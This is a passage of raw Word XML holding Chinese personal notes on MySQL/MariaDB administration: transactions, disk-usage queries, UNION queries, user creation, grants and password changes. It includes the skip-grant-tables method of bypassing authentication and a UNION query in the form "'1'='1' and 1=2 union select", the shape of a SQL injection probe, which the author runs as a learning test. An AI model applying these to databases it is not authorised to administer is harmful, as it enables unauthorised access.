        <w:t>(Savepoint):</w:t>
      </w:r>
      <w:r>
        <w:t>事务集中的一个临时占位符，可进行回滚。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>alter table department</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>上面命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">initially deferred </w:t>
      </w:r>
      <w:r>
        <w:t>表示将对检查的约束推迟到事务的最后。相反的是</w:t>
      </w:r>
      <w:r>
        <w:t>initially immediate</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>begin;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into department (dno, dept_name, mgr_ssn) values('101', 'HR', '10001');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into department (dno, dept_name, mgr_ssn) values('102', 'FI', '20001');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into employee(ssn, name, salary, dno) values('10001','Zhao',20000, '101');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into employee(ssn, name, salary, dno) values('20001','Singh',19000, '102');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>中如何查看某个数据库或表占用的磁盘空间：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查整个库的状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>from information_schema.tables where TABLE_SCHEMA = 'databasename';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查单表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>from information_schema.tables where TABLE_NAME = 'tablename';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>程序每一次开启一个实例就需要一个端口，默认端口与其余端口都只能被一个实例占用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student.institution; </w:t>
      </w:r>
      <w:r>
        <w:t>没有这条命令，</w:t>
      </w:r>
      <w:r>
        <w:t>xx.xx</w:t>
      </w:r>
      <w:r>
        <w:t>是库</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1146 (42S02): Table 'student.institution' doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student; </w:t>
      </w:r>
      <w:r>
        <w:t>字段只能全部都查看，还有就是</w:t>
      </w:r>
      <w:r>
        <w:t>show columns from ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select count(*) from student where length(name)&gt;35;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select max(length(name)) from teacher; </w:t>
      </w:r>
      <w:r>
        <w:t>查</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>段最长纪录有多长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>改密码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>update mysql.user set password=password('newpassword') where user='username' #</w:t>
      </w:r>
      <w:r>
        <w:t>别忘了</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>是个加密函数，使用</w:t>
      </w:r>
      <w:r>
        <w:t>MySQLSHA1</w:t>
      </w:r>
      <w:r>
        <w:t>加密。</w:t>
      </w:r>
      <w:r>
        <w:t>old_password()</w:t>
      </w:r>
      <w:r>
        <w:t>使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>Mysql323</w:t>
      </w:r>
      <w:r>
        <w:t>加密：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>update mysql.user set password='newpassword' where user='username'  update</w:t>
      </w:r>
      <w:r>
        <w:t>语句不支持对多个字段的友好修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果我们忘记了</w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>密码，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/my.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>[msqld]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>skip-grant-tables</w:t>
      </w:r>
      <w:r>
        <w:t>来登录进去再修改密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> #grant</w:t>
      </w:r>
      <w:r>
        <w:t>授予</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>以命令行参数启动</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>/usr/bin/mysqld_safe --skip-grant-tables &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据表合并并去重输出：（集合操作默认去重）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT TABLE.A FROM nammm5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>UNION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT TABLE.B FROM nammm5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>如果允许重复值使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>集合操作：（如果不想去重就在后面加上一个</w:t>
      </w:r>
      <w:r>
        <w:t>ALL</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认相当于在后面加上了一个</w:t>
      </w:r>
      <w:r>
        <w:t>DISTINCT</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>并</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> INTERSECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>差</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>需要前后目标的字段一样，如果两个表字段数不同要使用</w:t>
      </w:r>
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t>（集合</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：字段名为</w:t>
      </w:r>
      <w:r>
        <w:t>a,b,c,d</w:t>
      </w:r>
      <w:r>
        <w:t>，集合</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：字段名为</w:t>
      </w:r>
      <w:r>
        <w:t>b,c,d</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>select * from </w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>union all</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>select a='',* from </w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select * from jwc.teacher where '1'='1' and 1=2 union select count(*) from jwc.student limit 10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1222 (21000): The used SELECT statements have a different number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t>的使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' and 1=2 union select count(*) from jwc.student;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2 rows in set (0.05 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>创建合并数据表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into test1 (field1,field2,....) select (field1,field2,....) from test2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不重复插入来合并：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>条件不满足为空，无法插入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>INSERT INTO card(cardno, cardnum) SELECT '222', '200' FROM DUAL WHERE NOT EXISTS(SELECT cardno FROM card WHERE cardno = '222');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:t>insert ignore</w:t>
      </w:r>
      <w:r>
        <w:t>会忽略数据库中已经存在的数据</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>根据主键或者唯一索引判断</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，如果数据库没有数据，就插入新的数据，如果有数据的话就跳过这条数据</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>并给出</w:t>
      </w:r>
      <w:r>
        <w:t>warning</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>复制一个表到另一个数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [test2]&gt; insert into jwc.teacher select * from teacher</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>备份导出导入倒也是可以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>http://www.2cto.com/database/201205/131949.html</w:t>
      </w:r>
      <w:r>
        <w:t>有机会可以试一下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>从数据库里面获取信息，由</w:t>
      </w:r>
      <w:r>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:t>按照一定格式</w:t>
      </w:r>
      <w:r>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>，我再重定向。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我和猜想的一样没有加密的数据库备份可以用</w:t>
      </w:r>
      <w:r>
        <w:t>winhex</w:t>
      </w:r>
      <w:r>
        <w:t>直接查看。而且很适合被加密压缩。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库角色</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>被命名的一组与数据库操作相关的权限（权限的集合）。用户有着角色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CREATE ROLE &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>角色名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;;  --DBA,RESOURCE</w:t>
      </w:r>
      <w:r>
        <w:t>就是角色的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>grant</w:t>
      </w:r>
      <w:r>
        <w:t>命令进行授权，</w:t>
      </w:r>
      <w:r>
        <w:t>REVOKE</w:t>
      </w:r>
      <w:r>
        <w:t>取消。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>GRANT &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>角色</w:t>
      </w:r>
      <w:r>
        <w:t>1&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>角色</w:t>
      </w:r>
      <w:r>
        <w:t>2&gt;]… TO [&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>角色</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;|&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;][, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>角色</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;|&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>用户就是默认有</w:t>
      </w:r>
      <w:r>
        <w:t>LOGIN</w:t>
      </w:r>
      <w:r>
        <w:t>权限的角色，下面两条语句在权限上完全等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CREATE ROLE U1 LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>CREATE USER U1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>创建用户：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into mysql.user(Host,User,Password) values('localhost','guest',password('123456'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>新版</w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>字段改为</w:t>
      </w:r>
      <w:r>
        <w:t>authentication_string</w:t>
      </w:r>
      <w:r>
        <w:t>，且没了</w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>函数，新增用户：</w:t>
      </w:r>
      <w:r>
        <w:t>https://dev.mysql.com/doc/refman/8.0/en/creating-accounts.html</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>create user ‘root’@’%’ identified by ‘xxx’</w:t>
      </w:r>
      <w:r>
        <w:t>），改密码：</w:t>
      </w:r>
      <w:r>
        <w:t>https://dev.mysql.com/doc/refman/8.0/en/set-password.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>需要重启，才会让对</w:t>
      </w:r>
      <w:r>
        <w:t>mysql.user</w:t>
      </w:r>
      <w:r>
        <w:t>更改成功。创建的用户似乎默认只有</w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t>等等的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE USER &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; [WITH] [DBA|RESOURCE|CONNECT];  RESOURCE </w:t>
      </w:r>
      <w:r>
        <w:t>不能创建用户和模式，可以创建表等对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>权限：</w:t>
      </w:r>
      <w:r>
        <w:t>rename</w:t>
      </w:r>
      <w:r>
        <w:t>了以后要注意跟新权限。可以说是权限赋予，也可以说成权限赋予。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>grant all privileges on xspeeder.* to 'guest'@'localhost' identified by '123456';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>xspeeder</w:t>
      </w:r>
      <w:r>
        <w:t>数据库的所有权限都给</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>.*</w:t>
      </w:r>
      <w:r>
        <w:t>表示所有数据表。</w:t>
      </w:r>
      <w:r>
        <w:t>*.*</w:t>
      </w:r>
      <w:r>
        <w:t>就表示所有数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>GRANT &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;, [, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ON &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>TO &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>[WITH GRANT OPTION];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>grant select on xspeeder.* to guest@localhost identified by '123456'; #</w:t>
      </w:r>
      <w:r>
        <w:t>只有这个权限不能使用</w:t>
      </w:r>
      <w:r>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t>备份</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>只给</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>查询权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>flush privileges;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>刷新系统权限表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>任何一个用户甚至不存在的登进去了，可以看到一点</w:t>
      </w:r>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t>的表，而尝试将</w:t>
      </w:r>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t>权限授权给用户时候会出错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>用户权限：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">show grants for </w:t>
      </w:r>
      <w:r>
        <w:t>你的用户</w:t>
      </w:r>
      <w:r>
        <w:t>@127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
